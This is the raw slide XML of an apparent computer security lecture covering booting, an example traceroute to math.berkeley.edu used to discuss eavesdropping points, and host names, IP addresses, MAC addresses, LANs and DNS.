            <a:ext cx="11112910" cy="3894880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>General computer security principles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Booting a computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BIOS, bincode.bin and early initialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>U-boot and Grub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Partitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Loading and executing kernels (e.g.-vmlinux and initramfs)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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2448454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and interposition of network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391440" y="1757362"/>
            <a:ext cx="11582400" cy="4788256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Suppose I talk to math.berkeley.edu, what systems can Eve use to evesdrop on my communications?  Use traceroute to find out:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="18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traceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to math.berkeley.edu (128.32.213.142), 64 hops max, 52 byte packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 1  192.168.1.1 (192.168.1.1)  1.699 ms  1.697 ms  1.066 ms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 2  10.0.0.1 (10.0.0.1)  4.102 ms  2.699 ms  5.240 ms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 3  96.120.89.233 (96.120.89.233)  11.316 ms  12.275 ms  11.116 ms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 13  et3-48.inr-311-ewdc.berkeley.edu (128.32.0.101)  15.574 ms  16.101 ms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    et3-47.inr-311-ewdc.berkeley.edu (128.32.0.103)  15.875 ms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>14  firewall-dc.math.berkeley.edu (128.32.16.148)  15.054 ms  18.605 ms  15.691 ms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>15  math.berkeley.edu (128.32.213.142)  17.046 ms !Z  15.820 ms !Z  15.388 ms !Z</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A good place to start is my router (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1).</a:t>
            </a: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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2147779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Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391440" y="1286490"/>
            <a:ext cx="11582400" cy="4788256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.cnn.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</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Mnemonic name understood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>by humans</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Mapped to IP address by DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (e.g., 64.236.16.20 for IPv4)</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Numerical address understood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>by routers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAC address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (e.g., 00-15-C5-49-04-A9)</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Numerical address understood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>within local area network</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Unique, hard-coded in the adapter when it is built</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Flat name space of 48 bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>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41</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62991" y="6169581"/>
            <a:ext cx="7492757" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adapted from course notes by Jennifer Rexford.  Thanks, Jennifer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3292907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Things can change</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413432" y="1762453"/>
            <a:ext cx="11141260" cy="4376373"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Local area networks (LANs)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A LAN is an “L2” network that spans a small geographical area, for example a house.</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LANs don’t have to use IP (e.g., IPX, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Appletalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, X.25, …), though most LANs are IP based these days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On a LAN, you can send packed directly to a MAC address.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 host may move to a new location </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So, cannot simply assign a static IP address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Must identify the adapter during bootstrap process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Need to talk to the adapter to assign it an IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>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42</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2850552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who says what</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391440" y="1716504"/>
            <a:ext cx="11582400" cy="4358241"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">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Host name:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.cs.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>princeton.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"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altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: registrar for each top-level domain (e.g., .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">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altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: local administrator assigns to each host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">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IP addresses:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>128.112</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>7.156</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"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altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prefixes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: ICANN, regional Internet registries, and ISPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: static configuration, or dynamic using DHCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">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MAC addresses:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>00-15-C5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>49-04-A9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Blocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: assigned to vendors by the IEEE, available only on LAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adapters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: assigned by the vendor from its block</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43</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871940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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371867" y="1634835"/>
            <a:ext cx="11582400" cy="4569115"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Maps names (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.microsoft.com</a:t>
            </a:r>
            <a:r>
